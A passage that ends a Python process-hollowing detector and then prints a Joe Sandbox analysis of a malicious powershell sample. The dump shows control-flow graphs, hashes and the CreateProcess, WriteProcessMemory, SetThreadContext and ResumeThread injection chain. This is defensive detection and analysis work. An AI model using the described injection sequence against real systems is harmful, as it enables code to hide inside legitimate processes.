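    starting from a CreateProcess carrying CREATE_SUSPENDED.

    Extra calls for a stage already passed (several WriteProcessMemory calls for
    the headers and each section) are accumulated, not treated as a reset; a
    suspended launch that is resumed without any write never alerts."""
    pending = {}  # (src, dst) -> {"next": index of the stage awaited, "events": [...]}
    alerts = []
    for ev in sorted(events, key=lambda e: e["seq"]):
        stage = STAGE_OF.get(ev["api"])
        if stage is None:
            continue
        key = (ev["pid"], ev["target"])
        if stage == "CreateProcess":
            if ev.get("flags", 0) & CREATE_SUSPENDED:
                pending[key] = {"next": 1, "events": [ev]}
            continue
        state = pending.get(key)
        if state is None:
            continue  # touching a process this source did not create suspended
        state["events"].append(ev)
        if STAGES[state["next"]] == stage:
            state["next"] += 1
        if state["next"] == len(STAGES):
            alerts.append(summarise(key, state["events"]))
            del pending[key]
    return alerts


if __name__ == "__main__":
    for alert in detect_hollowing(TRACE):
        print(alert)
```

The order is deliberately strict, because that is the order the graph shows; a loader that patches the entry point in place and skips SetThreadContext would not complete the chain, so in production the WriteProcessMemory-then-ResumeThread pair on a suspended child deserves a lower-severity alert of its own. Correlating the alert with a memory scan of the target at the written addresses (here 0x400000, where the report's Yara rules fire) turns the behavioural hit into a confirmed one.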

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 685 2a9669-2a96a9 686 2a96ab 685->686 687 2a96b0-2a9782 685->687 686->687 688 2a9783-2a9866 call 2a91e0 687->688 694 2a9868-2a9884 688->694 695 2a988f-2a98b8 688->695 694->695 698 2a98ba 695->698 699 2a98bf-2a9904 695->699 698->699 703 2a990b-2a9937 699->703 704 2a9906 699->704 706 2a9939-2a9974 703->706 707 2a99a1-2a99db 703->707 704->703 710 2a999d-2a999f 706->710 711 2a9976-2a9992 706->711 712 2a99dd-2a99f9 707->712 713 2a9a04-2a9a0e 707->713 710->713 711->710 712->713 714 2a9a10 713->714 715 2a9a15-2a9a2d 713->715 714->715 717 2a9a2f 715->717 718 2a9a34-2a9a70 715->718 717->718 723 2a9a99-2a9a9f 718->723 724 2a9a72-2a9a8e 718->724 725 2a9ad1-2a9ad3 723->725 726 2a9aa1-2a9acf 723->726 724->723 727 2a9ad9-2a9aed 725->727 726->727 730 2a9aef-2a9b0b 727->730 731 2a9b16-2a9b20 727->731 730->731 732 2a9b22 731->732 733 2a9b27-2a9b4b 731->733 732->733 737 2a9b4d 733->737 738 2a9b52-2a9bb5 733->738 737->738 742 2a9bde-2a9c1f call 2a8e48 738->742 743 2a9bb7-2a9bd3 738->743 746 2a9c48-2a9c52 742->746 747 2a9c21-2a9c3d 742->747 743->742 748 2a9c59-2a9c66 746->748 749 2a9c54 746->749 747->746 752 2a9c68 748->752 753 2a9c6d-2a9c8b 748->753 749->748 752->753 756 2a9c8d 753->756 757 2a9c92-2a9c9e 753->757 756->757 758 2a9e5e-2a9e7a 757->758 759 2a9ca3-2a9cae 758->759 760 2a9e80-2a9ea4 758->760 761 2a9cb0 759->761 762 2a9cb5-2a9cdc 759->762 764 2a9eab-2a9ee9 call 2a8e48 760->764 765 2a9ea6 760->765 761->762 767 2a9cde 762->767 768 2a9ce3-2a9d0a 762->768 770 2a9eeb-2a9f07 764->770 771 2a9f12-2a9f1c 764->771 765->764 767->768 773 2a9d0c 768->773 774 2a9d11-2a9d48 768->774 770->771 775 2a9f1e 771->775 776 2a9f23-2a9f50 771->776 773->774 781 2a9d4e-2a9d5c 774->781 782 2a9e2f-2a9e39 774->782 775->776 783 2a9f5a-2a9f63 776->783 784 2a9f52-2a9f59 776->784 785 2a9d5e 781->785 786 2a9d63-2a9d6a 781->786 789 2a9e3b 782->789 790 2a9e40-2a9e51 782->790 787 2a9f6a-2a9f7a 783->787 788 2a9f65 783->788 784->783 785->786 793 2a9d6c 786->793 
794 2a9d71-2a9db9 786->794 795 2a9f7c 787->795 796 2a9f81-2a9fb2 787->796 788->787 789->790 791 2a9e58 790->791 792 2a9e53 790->792 791->758 792->791 793->794 802 2a9dbb 794->802 803 2a9dc0-2a9de3 call 2a8e48 794->803 795->796 799 2aa01c-2aa056 796->799 800 2a9fb4-2a9fca 796->800 808 2aa058-2aa074 799->808 809 2aa07f-2aa08e 799->809 834 2a9fcd call 2a8af8 800->834 835 2a9fcd call 2a8b00 800->835 802->803 810 2a9de5-2a9e05 803->810 804 2a9fcf-2a9fef 806 2aa018-2aa01a 804->806 807 2a9ff1-2aa00d 804->807 806->809 807->806 808->809 831 2aa091 call 2a8a08 809->831 832 2aa091 call 2a8a10 809->832 812 2a9e2e 810->812 813 2a9e07-2a9e23 810->813 812->782 813->812 815 2aa093-2aa0b3 816 2aa0dc-2aa144 815->816 817 2aa0b5-2aa0d1 815->817 822 2aa14b-2aa163 816->822 823 2aa146 816->823 817->816 822->688 825 2aa169-2aa171 822->825 823->822 831->815 832->815 834->804 835->804
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373266998.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2a0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8%
                                • API String ID: 0-1691505143
                                • Opcode ID: 5124060e568a33fab2080fb066a570b049bc94faddbd6ae0f41cbff8ef1b4cf4
                                • Instruction ID: f0a7d9f14c801b1fdfdc24b161a478baa18f8f156870aed7b5eed58c4eedb28f
                                • Opcode Fuzzy Hash: 5124060e568a33fab2080fb066a570b049bc94faddbd6ae0f41cbff8ef1b4cf4
                                • Instruction Fuzzy Hash: C9620475E002298FDB68DF69C894BDDBBB2BF89301F5480EA9409A7255DB305EC6CF50
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$$p$$p$$p$$p$$p$$p
                                • API String ID: 0-1321977132
                                • Opcode ID: e040b336a8f75b22e9585916600cf8c3b4e15a214b63b9efda031762507c8028
                                • Instruction ID: d30413ed9ff5fb132d8814d27344a397cb10fb2a32c1547ef89bcf1f9fd847cf
                                • Opcode Fuzzy Hash: e040b336a8f75b22e9585916600cf8c3b4e15a214b63b9efda031762507c8028
                                • Instruction Fuzzy Hash: CF02F231B04201DFCB2E8F68C455EAABBE5AFC4316F25C06ADC558B261DB71CD89CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 171 353a08-353a2b 172 353a31-353a36 171->172 173 353be9-353c35 171->173 174 353a4e-353a52 172->174 175 353a38-353a3e 172->175 183 353dc1-353e0b 173->183 184 353c3b-353c40 173->184 176 353b90-353b9a 174->176 177 353a58-353a5a 174->177 179 353a40 175->179 180 353a42-353a4c 175->180 185 353b9c-353ba5 176->185 186 353ba8-353bae 176->186 181 353a5c-353a68 177->181 182 353a6a 177->182 179->174 180->174 188 353a6c-353a6e 181->188 182->188 200 353e11-353e16 183->200 201 353f62-353fa6 183->201 189 353c42-353c48 184->189 190 353c58-353c5c 184->190 191 353bb4-353bc0 186->191 192 353bb0-353bb2 186->192 188->176 194 353a74-353a78 188->194 195 353c4c-353c56 189->195 196 353c4a 189->196 198 353d71-353d7b 190->198 199 353c62-353c64 190->199 197 353bc2-353be6 191->197 192->197 202 353a98 194->202 203 353a7a-353a96 194->203 195->190 196->190 204 353d7d-353d86 198->204 205 353d89-353d8f 198->205 207 353c74 199->207 208 353c66-353c72 199->208 211 353e2e-353e32 200->211 212 353e18-353e1e 200->212 258 353fb4-353fcc 201->258 259 353fa8-353faa 201->259 216 353a9a-353a9c 202->216 203->216 213 353d95-353da1 205->213 214 353d91-353d93 205->214 209 353c76-353c78 207->209 208->209 209->198 217 353c7e-353c9d 209->217 223 353f0f-353f19 211->223 224 353e38-353e3a 211->224 219 353e20 212->219 220 353e22-353e2c 212->220 222 353da3-353dbe 213->222 214->222 216->176 225 353aa2-353aa6 216->225 256 353cad 217->256 257 353c9f-353cab 217->257 219->211 220->211 229 353f27-353f2d 223->229 230 353f1b-353f24 223->230 232 353e3c-353e48 224->232 233 353e4a 224->233 226 353ab9 225->226 227 353aa8-353ab7 225->227 239 353abb-353abd 226->239 227->239 240 353f33-353f3f 229->240 241 353f2f-353f31 229->241 234 353e4c-353e4e 232->234 233->234 234->223 243 353e54-353e58 234->243 239->176 244 353ac3-353ac5 239->244 245 353f41-353f5f 240->245 241->245 246 353e78 243->246 247 353e5a-353e76 243->247 251 353ac7-353acd 244->251 252 353adf-353af9 244->252 260 353e7a-353e7c 
246->260 247->260 254 353ad1-353add 251->254 255 353acf 251->255 269 353b08-353b1e 252->269 270 353afb-353afe 252->270 254->252 255->252 263 353caf-353cb1 256->263 257->263 274 353fd0-353fd2 258->274 275 353fce 258->275 259->258 260->223 264 353e82-353e85 260->264 263->198 267 353cb7-353cd6 263->267 273 353e8f-353e95 264->273 288 353cee-353d0d 267->288 289 353cd8-353cde 267->289 279 353b36-353b8d 269->279 280 353b20-353b26 269->280 270->269 281 353e9b-353e9d 273->281 278 353fdc-353fdd 274->278 275->278 282 353b28 280->282 283 353b2a-353b2c 280->283 286 353eb5-353f0c 281->286 287 353e9f-353ea5 281->287 282->279 283->279 290 353ea7 287->290 291 353ea9-353eab 287->291 297 353d14-353d62 288->297 298 353d0f-353d12 288->298 293 353ce0 289->293 294 353ce2-353ce4 289->294 290->286 291->286 293->288 294->288 299 353d67-353d6e 297->299 298->299
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$h%g$h%g
                                • API String ID: 0-2787474186
                                • Opcode ID: 816ab4900ed64cb0735be32f45314356038657958e1cb2597774a3397ca582bf
                                • Instruction ID: d88df3167f8d914034af5b03fa200da34fd2692fb18f71a5aaca3bda887b885c
                                • Opcode Fuzzy Hash: 816ab4900ed64cb0735be32f45314356038657958e1cb2597774a3397ca582bf
                                • Instruction Fuzzy Hash: C1E13731B043009FCB169B78D850BAEBBF5AFC5352F2584AADC45CB261DA71CE49C7A1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 306 3552b4-3552b7 307 3552bd-3552c5 306->307 308 3552b9-3552bb 306->308 309 3552c7-3552cd 307->309 310 3552dd-3552e1 307->310 308->307 320 3552d1-3552db 309->320 321 3552cf 309->321 311 3552e7-3552eb 310->311 312 35540c-355416 310->312 313 3552ed-3552fe 311->313 314 35532b 311->314 315 355424-35542a 312->315 316 355418-355421 312->316 328 355464-3554b3 313->328 329 355304-355309 313->329 322 35532d-35532f 314->322 318 355430-35543c 315->318 319 35542c-35542e 315->319 324 35543e-355461 318->324 319->324 320->310 321->310 322->312 325 355335-355339 322->325 325->312 327 35533f-355343 325->327 327->312 331 355349-35536f 327->331 338 3556b6-3556c3 328->338 339 3554b9-3554be 328->339 332 355321-355329 329->332 333 35530b-355311 329->333 331->312 351 355375-355379 331->351 332->322 336 355315-35531f 333->336 337 355313 333->337 336->332 337->332 342 3554d6-3554da 339->342 343 3554c0-3554c6 339->343 348 3554e0-3554e2 342->348 349 35565f-355669 342->349 345 3554c8 343->345 346 3554ca-3554d4 343->346 345->342 346->342 352 3554e4-3554f0 348->352 353 3554f2 348->353 354 355675-35567b 349->354 355 35566b-355672 349->355 357 35539c 351->357 358 35537b-355384 351->358 359 3554f4-3554f6 352->359 353->359 360 355681-35568d 354->360 361 35567d-35567f 354->361 365 35539f-3553ac 357->365 362 355386-355389 358->362 363 35538b-355398 358->363 359->349 364 3554fc-35551b 359->364 366 35568f-3556b3 360->366 361->366 368 35539a 362->368 363->368 376 35551d-355529 364->376 377 35552b 364->377 369 3553b2-355409 365->369 368->365 378 35552d-35552f 376->378 377->378 378->349 379 355535-355539 378->379 379->349 380 35553f-355543 379->380 381 355545-355554 380->381 382 355556 380->382 383 355558-35555a 381->383 382->383 383->349 384 355560-355564 383->384 384->349 385 35556a-355589 384->385 388 3555a1-3555ac 385->388 389 35558b-355591 385->389 392 3555ae-3555b1 388->392 393 3555bb-3555d7 388->393 390 355595-355597 389->390 391 355593 389->391 
390->388 391->388 392->393 394 3555f4-3555fe 393->394 395 3555d9-3555ec 393->395 396 355600 394->396 397 355602-355650 394->397 395->394 398 355655-35565c 396->398 397->398
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (op$(op$L4p$L4p$L4p
                                • API String ID: 0-2509652690
                                • Opcode ID: 73d748ff25e0a7ab64b352c15a549d0e0a80447da2c590dfb006d5c8b468b91e
                                • Instruction ID: 59f6c127acb13972f6a9aafe0be52dfc021376223f6dae3c3fc642c7cad71d0b
                                • Opcode Fuzzy Hash: 73d748ff25e0a7ab64b352c15a549d0e0a80447da2c590dfb006d5c8b468b91e
                                • Instruction Fuzzy Hash: 41B13C35700645DFCB168F28C860FAEBBB2AF85312F658469DD468B2B1DB70EC49CB51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 405 2a91e0-2a9279 407 2a927b-2a9292 405->407 408 2a92c2-2a92ea 405->408 407->408 413 2a9294-2a9299 407->413 411 2a92ec-2a9300 408->411 412 2a9330-2a9386 408->412 411->412 420 2a9302-2a9307 411->420 422 2a9388-2a939c 412->422 423 2a93cc-2a94c3 CreateProcessA 412->423 414 2a929b-2a92a5 413->414 415 2a92bc-2a92bf 413->415 417 2a92a9-2a92b8 414->417 418 2a92a7 414->418 415->408 417->417 421 2a92ba 417->421 418->417 424 2a932a-2a932d 420->424 425 2a9309-2a9313 420->425 421->415 422->423 431 2a939e-2a93a3 422->431 441 2a94cc-2a95b1 423->441 442 2a94c5-2a94cb 423->442 424->412 426 2a9317-2a9326 425->426 427 2a9315 425->427 426->426 430 2a9328 426->430 427->426 430->424 432 2a93c6-2a93c9 431->432 433 2a93a5-2a93af 431->433 432->423 435 2a93b3-2a93c2 433->435 436 2a93b1 433->436 435->435 437 2a93c4 435->437 436->435 437->432 454 2a95b3-2a95b7 441->454 455 2a95c1-2a95c5 441->455 442->441 454->455 456 2a95b9 454->456 457 2a95c7-2a95cb 455->457 458 2a95d5-2a95d9 455->458 456->455 457->458 459 2a95cd 457->459 460 2a95db-2a95df 458->460 461 2a95e9-2a95ed 458->461 459->458 460->461 462 2a95e1 460->462 463 2a95ef-2a9618 461->463 464 2a9623-2a962e 461->464 462->461 463->464 468 2a962f 464->468 468->468
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002A94A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373266998.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2a0000_powershell.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID: 8%$8%$8%
                                • API String ID: 963392458-3701733527
                                • Opcode ID: 4cf972cf361807221305b4830bd137721b5e33f02932e2071fe09dbde2264769
                                • Instruction ID: 257095c99ee16f0dc40f4829dbe17de894637e93d1c9971e79ada4350ee9455c
                                • Opcode Fuzzy Hash: 4cf972cf361807221305b4830bd137721b5e33f02932e2071fe09dbde2264769
                                • Instruction Fuzzy Hash: 9BC12770D1021A8FDF25CFA9C841BEEBBB1BF49300F0095A9D859B7290DB749A95CF94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 469 3543e8-35440b 470 3545e6-354612 469->470 471 354411-354416 469->471 479 354614-354619 470->479 480 35465f-354699 470->480 472 35442e-354432 471->472 473 354418-35441e 471->473 477 354593-35459d 472->477 478 354438-35443c 472->478 475 354420 473->475 476 354422-35442c 473->476 475->472 476->472 481 35459f-3545a8 477->481 482 3545ab-3545b1 477->482 483 35444f 478->483 484 35443e-35444d 478->484 485 354631-354649 479->485 486 35461b-354621 479->486 496 3546b8 480->496 497 35469b-3546b6 480->497 488 3545b7-3545c3 482->488 489 3545b3-3545b5 482->489 490 354451-354453 483->490 484->490 500 354657-35465c 485->500 501 35464b-35464d 485->501 493 354625-35462f 486->493 494 354623 486->494 495 3545c5-3545e3 488->495 489->495 490->477 491 354459-354479 490->491 516 354498 491->516 517 35447b-354496 491->517 493->485 494->485 504 3546ba-3546bc 496->504 497->504 501->500 507 3546c2-3546c6 504->507 508 35474a-354754 504->508 507->508 511 3546cc-3546e9 507->511 512 354756-35475d 508->512 513 354760-354766 508->513 522 3546ef-3546f1 511->522 523 354799-35479e 511->523 514 35476c-354778 513->514 515 354768-35476a 513->515 520 35477a-354796 514->520 515->520 521 35449a-35449c 516->521 517->521 521->477 526 3544a2-3544a4 521->526 527 3546f3-3546f9 522->527 528 35470b-354720 522->528 523->522 530 3544b4 526->530 531 3544a6-3544b2 526->531 532 3546fd-354709 527->532 533 3546fb 527->533 541 354726-354744 528->541 542 3547a3-3547d4 528->542 536 3544b6-3544b8 530->536 531->536 532->528 533->528 536->477 537 3544be-3544de 536->537 550 3544f6-3544fa 537->550 551 3544e0-3544e6 537->551 541->508 546 3547e4 542->546 547 3547d6-3547e2 542->547 549 3547e6-3547e8 546->549 547->549 552 35480a-354814 549->552 553 3547ea-3547ee 549->553 556 354514-354518 550->556 557 3544fc-354502 550->557 554 3544e8 551->554 555 3544ea-3544ec 551->555 559 354816-35481b 552->559 560 35481e-354824 552->560 553->552 558 3547f0-354807 553->558 554->550 555->550 563 
35451f-354521 556->563 561 354504 557->561 562 354506-354512 557->562 564 354826-354828 560->564 565 35482a-354836 560->565 561->556 562->556 566 354523-354529 563->566 567 354539-354590 563->567 569 354838-354852 564->569 565->569 571 35452d-35452f 566->571 572 35452b 566->572 571->567 572->567
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$$p$$p$$p
                                • API String ID: 0-2334450948
                                • Opcode ID: 70ea95d3ec16305f2e683d461b05513a04620169fb4251abb54b186fc9ab91bf
                                • Instruction ID: 0333528aea1bc9c76374ff72f9d44defcc7dc84ae5fb79d366ca6d43349c47e5
                                • Opcode Fuzzy Hash: 70ea95d3ec16305f2e683d461b05513a04620169fb4251abb54b186fc9ab91bf
                                • Instruction Fuzzy Hash: 47C149357043409FCB1A9B79D410F6ABBE29FC6316F25846BDC45CB2A1EA71CC8AC761

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 577 3543c8-35440b 578 3545e6-354612 577->578 579 354411-354416 577->579 587 354614-354619 578->587 588 35465f-354699 578->588 580 35442e-354432 579->580 581 354418-35441e 579->581 585 354593-35459d 580->585 586 354438-35443c 580->586 583 354420 581->583 584 354422-35442c 581->584 583->580 584->580 589 35459f-3545a8 585->589 590 3545ab-3545b1 585->590 591 35444f 586->591 592 35443e-35444d 586->592 593 354631-354649 587->593 594 35461b-354621 587->594 604 3546b8 588->604 605 35469b-3546b6 588->605 596 3545b7-3545c3 590->596 597 3545b3-3545b5 590->597 598 354451-354453 591->598 592->598 608 354657-35465c 593->608 609 35464b-35464d 593->609 601 354625-35462f 594->601 602 354623 594->602 603 3545c5-3545e3 596->603 597->603 598->585 599 354459-354479 598->599 624 354498 599->624 625 35447b-354496 599->625 601->593 602->593 612 3546ba-3546bc 604->612 605->612 609->608 615 3546c2-3546c6 612->615 616 35474a-354754 612->616 615->616 619 3546cc-3546e9 615->619 620 354756-35475d 616->620 621 354760-354766 616->621 630 3546ef-3546f1 619->630 631 354799-35479e 619->631 622 35476c-354778 621->622 623 354768-35476a 621->623 628 35477a-354796 622->628 623->628 629 35449a-35449c 624->629 625->629 629->585 634 3544a2-3544a4 629->634 635 3546f3-3546f9 630->635 636 35470b-354720 630->636 631->630 638 3544b4 634->638 639 3544a6-3544b2 634->639 640 3546fd-354709 635->640 641 3546fb 635->641 649 354726-354744 636->649 650 3547a3-3547d4 636->650 644 3544b6-3544b8 638->644 639->644 640->636 641->636 644->585 645 3544be-3544de 644->645 658 3544f6-3544fa 645->658 659 3544e0-3544e6 645->659 649->616 654 3547e4 650->654 655 3547d6-3547e2 650->655 657 3547e6-3547e8 654->657 655->657 660 35480a-354814 657->660 661 3547ea-3547ee 657->661 664 354514-354518 658->664 665 3544fc-354502 658->665 662 3544e8 659->662 663 3544ea-3544ec 659->663 667 354816-35481b 660->667 668 35481e-354824 660->668 661->660 666 3547f0-354807 661->666 662->658 663->658 671 
35451f-354521 664->671 669 354504 665->669 670 354506-354512 665->670 672 354826-354828 668->672 673 35482a-354836 668->673 669->664 670->664 674 354523-354529 671->674 675 354539-354590 671->675 677 354838-354852 672->677 673->677 679 35452d-35452f 674->679 680 35452b 674->680 679->675 680->675
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$$p$$p
                                • API String ID: 0-2931952147
                                • Opcode ID: c3dca66c2c451a1ab062bbcee9a93d43fc9b69368a4441b8a1001139abddaf41
                                • Instruction ID: b9fbe5767b1a2b4f70c4892acf18b9205a349a8c44a68cb0f68f6283d9ab2590
                                • Opcode Fuzzy Hash: c3dca66c2c451a1ab062bbcee9a93d43fc9b69368a4441b8a1001139abddaf41
                                • Instruction Fuzzy Hash: 403128706043449FCF2A8E25D400B7A7BB59F8230AF268466DC449B5A1EB75CCCADB21

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 836 2a8e48-2a8eb3 838 2a8eca-2a8f31 WriteProcessMemory 836->838 839 2a8eb5-2a8ec7 836->839 841 2a8f3a-2a8f8c 838->841 842 2a8f33-2a8f39 838->842 839->838 842->841
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002A8F1B
                                Memory Dump Source
                                • Source File: 00000006.00000002.373266998.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2a0000_powershell.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 0cee31d59c51a34d9b0f1a6b0d38d17b968712549acbd73e2ea58afd42e75eca
                                • Instruction ID: 5a90e9a9fdf09ddb2fcf373fe4814d5f184c9d3852fe7c4c16018a9d1f0d6412
                                • Opcode Fuzzy Hash: 0cee31d59c51a34d9b0f1a6b0d38d17b968712549acbd73e2ea58afd42e75eca
                                • Instruction Fuzzy Hash: 6241AAB4D002499FCF00CFA9D984AEEFBF1BB49314F20942AE814B7250D734AA55CF64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 847 2a8af8-2a8b60 850 2a8b62-2a8b74 847->850 851 2a8b77-2a8bc5 Wow64SetThreadContext 847->851 850->851 853 2a8bce-2a8c1a 851->853 854 2a8bc7-2a8bcd 851->854 854->853
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 002A8BAF
                                Memory Dump Source
                                • Source File: 00000006.00000002.373266998.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2a0000_powershell.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 407ecdcdd8f37d158370f937d23596defc0571f4c6d901b3a7d1b7ae4f93c158
                                • Instruction ID: b069f4f0ac6cc155bf70a862e4d58cdfca5819ae37fdb7650b0fbcb28878cecd
                                • Opcode Fuzzy Hash: 407ecdcdd8f37d158370f937d23596defc0571f4c6d901b3a7d1b7ae4f93c158
                                • Instruction Fuzzy Hash: 3B41CCB5D102599FCF10CFA9D984AEEFBB1BF49314F24842AE414B7240D7789945CF64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 859 2a8b00-2a8b60 861 2a8b62-2a8b74 859->861 862 2a8b77-2a8bc5 Wow64SetThreadContext 859->862 861->862 864 2a8bce-2a8c1a 862->864 865 2a8bc7-2a8bcd 862->865 865->864
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 002A8BAF
                                Memory Dump Source
                                • Source File: 00000006.00000002.373266998.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2a0000_powershell.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: ee46228a10054a03c96d502fadc05ee48dc13209ad35a7faeb33e8f45214f0d2
                                • Instruction ID: 9909c84c306db347e8748c861fb4a03a403e4192c727793ad97dd0d190d7617b
                                • Opcode Fuzzy Hash: ee46228a10054a03c96d502fadc05ee48dc13209ad35a7faeb33e8f45214f0d2
                                • Instruction Fuzzy Hash: AD41AAB4D102599FCB10CFA9D984AEEFBB1AB49314F24842AE418B7250D778A949CF64

                                Control-flow Graph
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 002A8A8E
                                Memory Dump Source
                                • Source File: 00000006.00000002.373266998.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2a0000_powershell.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 0de039b41e9a0094c43df9ad30967b6f104b31fbe2fef6c3c546dac5ee2719df
                                • Instruction ID: f63f5cff9210cab10bbe9fa68ba0f4d096856ab452b5aedc348ae1550e510e80
                                • Opcode Fuzzy Hash: 0de039b41e9a0094c43df9ad30967b6f104b31fbe2fef6c3c546dac5ee2719df
                                • Instruction Fuzzy Hash: E931D9B4D102589FCF10CFA9D980AEEFBB1EB49314F14982AE814B7311CB34A906CF94

                                Control-flow Graph
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 002A8A8E
                                Memory Dump Source
                                • Source File: 00000006.00000002.373266998.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2a0000_powershell.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 1367f7b551ce048ae39a9f25ced964821f8331808e318ae65c937f06e8aeffad
                                • Instruction ID: 2e76ca8b9534bcaa8e4137983c2b3b62ffc760cfea589afb3483c845f58611bd
                                • Opcode Fuzzy Hash: 1367f7b551ce048ae39a9f25ced964821f8331808e318ae65c937f06e8aeffad
                                • Instruction Fuzzy Hash: FE31BAB4D102199FCF10CFA9D984AAEFBB5EF49314F14942AE815B7300DB35A905CF94

                                Control-flow Graph
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p
                                • API String ID: 0-481844870
                                • Opcode ID: 86304c51306b20ca3df1fa6b1cc46282b57a6572ad4857d7f15dec45e7e65c05
                                • Instruction ID: 6ce865f77248da25f26cfcb175b1d8d727a86aa8ab300c11afb83ff18083883b
                                • Opcode Fuzzy Hash: 86304c51306b20ca3df1fa6b1cc46282b57a6572ad4857d7f15dec45e7e65c05
                                • Instruction Fuzzy Hash: 3821C532A052049FCB569E28C452BAABBF4AF85392F268066DC05C7271D770CE49C791

                                Control-flow Graph
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p
                                • API String ID: 0-481844870
                                • Opcode ID: 87d6788f91ecad5a1e86d39d133034466dc2ca0bc49c4903a9748334636273c8
                                • Instruction ID: a8c2400c2d4298a23ccc1800a98bfac7a5eb0bc84f714cccdf60c10d9cabd6a0
                                • Opcode Fuzzy Hash: 87d6788f91ecad5a1e86d39d133034466dc2ca0bc49c4903a9748334636273c8
                                • Instruction Fuzzy Hash: 5A218E30A00205DBCB2EDE68C556F69B7F9BB8435AF168066D80887275D771DCC9CB91

                                Control-flow Graph
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p
                                • API String ID: 0-481844870
                                • Opcode ID: e05ea7165da56ce583afeb61ed3567d502eea7f475fbaa22b39998d4a6ed768f
